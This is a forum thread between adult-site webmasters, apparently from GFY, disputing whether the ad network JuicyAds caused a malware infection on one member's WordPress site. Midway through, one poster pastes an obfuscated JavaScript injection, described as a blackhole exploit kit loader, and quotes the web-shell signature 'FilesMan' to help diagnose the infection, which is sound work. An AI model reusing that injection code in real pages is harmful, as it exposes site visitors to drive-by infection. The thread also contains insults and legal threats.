Juicyads placed malwares into my site
 

hi everyone

I placed some ads of juicyads into my site,

and they placed a ver bad malware into my site.

it happened also 12 months ago, but I didn't understood where malwares came from,
2 days ago happened again,
now I'm on a dedicated server. and juicyads was the only part without my entire control.

so now I'm sure. juicyads place fucking shit malwares

I spent 6.000 euro for my new site, I contacted Jay of juicyads

he doesn't care at all.

I'm fucking tired of his shit.

yep looks like they don't care for some other things as well...
https://gfy.com/showthread.php?p=19728338#post19728338

hellboy,
I have requested additional information from you, which you have not provided. The code you have given me has no origin and i have no way to track anything back based on what you gave me. I'm unsure how you were able to get the code you provided without it being on your website directly, not through our network. If you had grabbed the code from any of our ads, it would have also included the FillerAd# and all the information we would need to know exactly which ad was responsible.
We already removed a malicious advertiser from the network yesterday and if it was related, then the issue is already handled.

We received your ticket on July 27th.
I replied on July 29th asking for more information.
Today, you went onto live support stating you hadn't gotten a reply, being threatening and abusive to the staff (logs available).
Then, went and replied to the ticket without any of the info I asked for.
Following that, before I was even at my desk today, you came here and posted this thread. When I was actively speaking with you via ticket as of yesterday.
I have also just replied to your ticket before coming here.

All networks contain some percentage of malware. We already have extensive scanning and anti-malware measures in place that has made us one of the cleanest networks in adult. As I stated, I believe we already caught an individual who may have been responsible for this and removed them from the network (before you even posted this thread). But, again, I'm not even sure this incidence came from our network without some additional info.

Since our ads run on an iframe, and not directly on your website, I'm not sure why you'd be blacklisted and not our website.


====
Homer,
I have your thread printed and here on my desk.
We are in the middle of the hosting move and are unable to do updates for certain systems until the move is complete. I have taken your post to heart and will be making changes based on your recommendations. Thank you.

hey

you are responsible for ads you place into my site, ok?
You must have all record of all advertisers showed into my site, ok?

I became really nervous into your chat, because 12 months ago I had similar problem and I moved my site into dedicated server to be more safe,
I spent 6.000 euro to run my site smoothly, and you placed a malware again into 2 days.

May I be little be nervous for that?

when you reply to my ticket, please tell me what info you need exactly from me,
and DON'T CLOSE the ticket.

I removed your malware with sucuri.net

I payed to remove your malware.

if your iframe is into my site, my site will be blacklisted

just inform yourself

I asked a full report to sucuri.net, you should refund me the sucuri cost and the damage

Why didn't you just remove their iframe if they were indeed the source?

If the malware originated from our network, it would not have been possible for you to pay a 3rd party provider "securi.net" to remove it from your website. It sounds a lot like there was malware directly on your website.

View our report here:
http://sitecheck.sucuri.net/results/juicyads.com
Even sucuri.net says we are clean.

Like I said already in the ticket, and this thread -- please forward the information to me where it says the malware came from our network. If you already paid this other company to somehow remove the malware, then they should be able to show you some record of it.

I'm sorry that your website had malware on it -- regardless of the source.

I have record of all the ads placed on your website, and if you can provide me with the report you said you paid for (in your ticket) then I'll take a look -- Honestly, this sounds pretty sketchy and you can continue contact with us through your ticket, thanks.

Plugrush...

If someone had to remove it, it wasn't from an ad network. Your website most likely got infected by a vulnerable script and there is the possibility you still have a backdoor hidden somewhere on your server.

If you know how to search inside files from the command-line (which i doubt) search for

$default_action = "FilesMan";

or any of the signatures on http://labs.sucuri.net/?malwaredb


warn: WordPress version outdated: Upgrade required. <= fix this!

This script is still on your site and has a high chance of being the culprit. Other sites who have the same code are all infected with the same "blackhole exploit kit"

<script>ps="s"+"p"+"l"+"i"+"t";asd=function(){--(d.body)};a=("20,20,160,155,47,57,153,166,152,174, 164,154,165,173,65,156,154,173,114,163,154,164,154 ,165,173,172,111,200,133,150,156,125,150,164,154,5 7,56,151,166,153,200,56,60,142,67,144,60,202,24,20 ,20,20,160,155,171,150,164,154,171,57,60,102,24,20 ,20,204,47,154,163,172,154,47,202,24,20,20,20,153, 166,152,174,164,154,165,173,65,176,171,160,173,154 ,57,51,103,160,155,171,150,164,154,47,172,171,152, 104,56,157,173,173,167,101,66,66,157,166,172,173,1 50,175,150,165,170,174,154,172,173,65,151,160,201, 66,172,113,201,73,173,67,146,67,167,135,121,135,67 ,146,164,172,123,130,64,67,125,171,156,64,150,67,1 46,72,176,76,156,66,70,71,100,100,110,67,152,64,15 6,135,114,67,163,156,140,174,66,67,100,135,146,77, 72,67,140,76,122,74,70,76,131,146,173,73,67,171,14 6,115,75,111,67,126,74,77,125,66,56,47,176,160,153 ,173,157,104,56,70,67,67,56,47,157,154,160,156,157 ,173,104,56,70,67,67,56,47,172,173,200,163,154,104 ,56,176,160,153,173,157,101,70,67,67,167,177,102,1 57,154,160,156,157,173,101,70,67,67,167,177,102,16 7,166,172,160,173,160,166,165,101,150,151,172,166, 163,174,173,154,102,163,154,155,173,101,64,70,67,6 7,67,67,167,177,102,173,166,167,101,67,102,56,105, 103,66,160,155,171,150,164,154,105,51,60,102,24,20 ,20,204,24,20,20,155,174,165,152,173,160,166,165,4 7,160,155,171,150,164,154,171,57,60,202,24,20,20,2 0,175,150,171,47,155,47,104,47,153,166,152,174,164 ,154,165,173,65,152,171,154,150,173,154,114,163,15 4,164,154,165,173,57,56,160,155,171,150,164,154,56 ,60,102,155,65,172,154,173,110,173,173,171,160,151 ,174,173,154,57,56,172,171,152,56,63,56,157,173,17 3,167,101,66,66,157,166,172,173,150,175,150,165,17 0,174,154,172,173,65,151,160,201,66,172,113,201,73 ,173,67,146,67,167,135,121,135,67,146,164,172,123, 130,64,67,125,171,156,64,150,67,146,72,176,76,156, 66,70,71,100,100,110,67,152,64,156,135,114,67,163, 156,140,174,66,67,100,135,146,77,72,67,140,76,122, 74,70,76,131,146,173,73,67,171,146,115,75,111,67,1 26,74,77,125,66,56,60,102,155,65,172,173,200,163,1 54,65,163,154,155,173,104,56,64,70,67,67,67,67,167 ,177,56,102,155,65,172,173,200,163,154,65,173,166, 167,104,56,67,56,102,155,65,172,173,200,163,154,65 ,167,166,172,160,173,160,166,165,104,56,150,151,17 2,166,163,174,173,154,56,102,155,65,172,173,200,16 3,154,65,173,166,167,104,56,67,56,102,155,65,172,1 54,173,110,173,173,171,160,151,174,173,154,57,56,1 76,160,153,173,157,56,63,56,70,67,67,56,60,102,155 ,65,172,154,173,110,173,173,171,160,151,174,173,15 4,57,56,157,154,160,156,157,173,56,63,56,70,67,67, 56,60,102,24,20,20,20,153,166,152,174,164,154,165, 173,65,156,154,173,114,163

I think you owe Juicyads an apology?

:thumbsup:thumbsup:thumbsup:thumbsup

hope its fixed

i don't think it is possible to hack your website from a frame, but it's possible to hack your visitors...

If you are tired then SECURE your shit better :2 cents::2 cents::2 cents:

Don't start shooting blame onto others when the person to blame is in the mirror

I don't know where you get this info, because my site is clean now

Your website and/or server can't become infected from an iframe.. the only way I could see that happening is if maybe one of the ads in the iframe infected YOUR COMPUTER, and then an attacker then used your computers access to your server to infect your server.

yes, you are right. but the problem can start from the ad

How? please explain...

Btw that code was on your website yesterday, you just removed it today.

i like where this is going :D

Kind of stupid isn't it?

He blames juicyads => i say its a specific code on his website and hand him a solution => he know's he's wrong blaming juicy, removes the code and acts like that piece of code was never on his website. :helpme

He did follow my advice to update wordpress though :D

Since he's not going to apologize for his slanderous comments ..

I want to say thanks to you for posting the exploit you found on his website and thanks for helping him out.

tokmansta

I removed the malware with sucuri.net
and removed a trojan inside my PC to solve the problem.
I didn't upgrade wordpress

I didn't follow your advice, so please don't talk like a genius.

I don't want to apologize to Jay because I don't have to,
he has some advertisers with malwares and one of them went into my site.
he didn't assist me, he just doesn't care.

The code was on your site again 2 mins ago and it tried to load something from the domain securelatterand .biz. Do you know that domain? It was nowhere in your html.

Could have been a cached version of your site in my browser, anyway glad that you got your site clean.

Wow, really?
You slander our brand on a public forum and say that we compromised your website, then its proven not to be us and you won't apologize?
Its completely impossible that "one of them went into [your] site"
So, because I didn't help you fix your website, for it being compromised (which has been shown to be completely unrelated to JuicyAds) you think its okay to make public false statements? Wow.
If I were you, I'd be removing every false statement you've made on this thread, to avoid possible legal liability.

Best of luck with another ad network, your account is no longer active with JuicyAds.

I'm not here to make false statements.

You admit that you found some advertisers with malwares.
also your chat support confirm me that it can happen.

this is how it went.
an advertiser placed a malware into an ad into my site,
this placed a trojan into my PC. trojan was attack my site.
I removed the malware the first time, but...the malware appear again into my site,
probably the trojan was doing that again and again.

I opened a ticket for this problem and you didn't help at all.
I received some comments that helped me to solve my problem.

I placed this thread because I live into a free country and into this forum I'm free to say what I want (you admit you had some smart advertiser, so I'm saying bullshits here)

Nobody has proven anything here about juicyads not responsible for this malware.

This can happen with all ad network, you also said that,
do please don't talk about "legal stuff"

I'm sure all webmasters are happy to use your ad network, they don't need to read my thread to make a decision.

bye

A: you are a grade A idiot :2 cents:
B: your site is infected and you still arent even trying to fix it
C: you must really have no clue..
D: just jump off the nearest bridge please








https://i.chzbgr.com/maxW500/7113948672/hFE88E939/


:1orglaugh:1orglaugh


http://i.qkme.me/3odpyw.jpg

Backwards logic.
By the same logic, you should be thrown in jail for being a terrorist because nobody has proven you're not. :2 cents:

I would continue with this thread, but obviously you don't and won't understand.

It's pretty obvious you don't have a clue how does the web work :1orglaugh

I won't even read anything else you have to say. Because you are probably wrong.

ok

this forum is full of genius

it's time for you to make blowjobs each others

tommy, pikapoka and jay, start to suck.

-----

call a lawyer for a forum thread, that's fantastic

you removed the Trojan on your pc ? how did you get a Trojan on your pc?

it sounds like your WP got hacked and you got infected that way in your own site. it's very likely the Trojan shared all your passwords on your pc with whoever wrote the Trojan.

if three Trojan in the juicyads iframe it would not be on your server since the iframe is not even on your server.
juicyads doesn't have to care about that, it's up to their own discretion how much they should care about your own problems with your own site and computer.
your statements are slanderous and can cause great harm to their business, you need to educate yourself before attacking companies this way. there was a lot of people posting dune advise here, you should listen to them.
right now you are probably on the path to kill your online business, a lot of people would not wish to work with anyone who makes such claims when they appear to have very little knowledge about what they actually talk about.

Computers infected by ads on a large scale are used for botnets or the installation of crappy toolbars to make money. The ads are not used to hack webmasters...

Your WP installation probably had a vulnerable script. Everyone here who owns a VPS or dedicated server can tell you their server logs are full of IP's scanning wordpress directories on your server.

They place a backdoor on your server and at a certain time a script checks if the malicious code got removed. If it's removed they upload it again automatically

Not having a good anti-virus program is your own fault imo.

If someone have access to your site backend they can upload all the shit they want even download, delete files etc

Hacking WP the regular way is easy with multiple ways to do it, too. Be safe and make regular backups. :thumbsup

Looking on the bright side, at least the guy was kind enough to allow others to learn from his mistakes by posting this thread.

:1orglaugh :1orglaugh case closed

:thumbsup:thumbsup

getting a little tired of congratulating you on all the work your doing for the OP, and the peeps the OP is going after

just a little tho :1orglaugh :thumbsup:thumbsup

just incredible

Well, i had the same problem a year ago and it's a pain in the ass when all your websites are flagged as infected by google :1orglaugh

If someone have access to your site backend they can upload all the shit they want even download, delete files etc

We have a 100% success rate for all the lawsuits and legal action we have filed, many of which has been based in Europe. :2 cents:

I will if you want .. your call. :thumbsup

I would definitely win (given all these public statements you've made) ... all there is to decide is how much the damages are worth $$ and how much you'll owe me .. do you own a house, or rent?

Orrrrrrr .. you could just, you know .. admit you were wrong? Seems much cheaper.

Great line! Kinda sums up the thread...

Jay

I first ask help to your chat, and your chat support told me that sometime you can have some malwares into your ads, because they are very smart sometime.
again, into this thread you wrote (post3)
"All networks contain some percentage of malware. We already have extensive scanning and anti-malware measures in place that has made us one of the cleanest networks in adult. As I stated, I believe we already caught an individual who may have been responsible for this and removed them from the network (before you even posted this thread). But, again, I'm not even sure this incidence came from our network without some additional info."

so, you gave me that info too
I'm not here to make false statements,
please read again your post3.

You don't understand what an IFRAME is. An IFRAME looks like it's part of your site but it isn't, the content/code inside the JuicyAds iframe is hosted on JuicyAds' own server. To you and web surfers it seamlessly looks like it's part of your website. If JuicyAds has malware in its iframes it's impossible for it to jump outside the iframe and infect your website. However if the iframe did have malware in it it can infect your own computer, I'm sure you visit your own site regularly. If your computer got infected with malware it's possible you infected your own site.

Mutt

YOU ARE RIGHT, I'M SAYING EXACTLY THIS.

malware infected my PC, and then infected my site.

this is what some smart forum users suggest me, and thanks to them I solved the problem.

WordPress 3.5.2

so dickwad why dont you apologize then?

another fucking moron :2 cents::2 cents:

did you read?

malware into ad, infected my pc first, then infected my site

probably malware was into ad, why I do have to apologize?

just read before write words like "fucking moron" to me.

it's just incredible.
-Jay admit that all ad network could have some malwares inside,
-other users give me a good point to understand how this malware works (from ad to pc, from pc to site).
-many users insults me with words like "idiot", "dickwad", "fucking moron"
-Jay wants a compensantion for...??? based on my proprieties and not based on his "image damage"

I just want to say thanks to all users like
tokmansta,Jakez,Mutt
that spent few minutes to give me a great point of you, just to find a solution to my problem,
thanks also to all users that spent few minutes to give me their point of view.
thanks to George Costanza too

fucking moron :2 cents::2 cents::2 cents::2 cents:

Proof or GFY ban;
(1) Claims that this happened "12 months ago" .. proof?
(2) New claim that our ads infected your PC, then somehow infected your website .. proof?

Or, withdraw your false statements.

No proof for slanderous statements = Ban from GFY, and liable for possible legal action.

Have a good weekend.

now you have to stop, because it's ridicoulous

first, I don't keep record of 12 months ago (I will ask sucuri.net if you want)
second, I will find a proof of everything happened now

(do you want a proof? read again your post3)

do you want my house?
I will ask an house to your friend of adultdatelink because he called me "dickwad" and "fucking moron"

so, you can do a smarter thing, ask an house to your friend directly, and stop breaking my balls with stupid things

ban me from gfy if you like.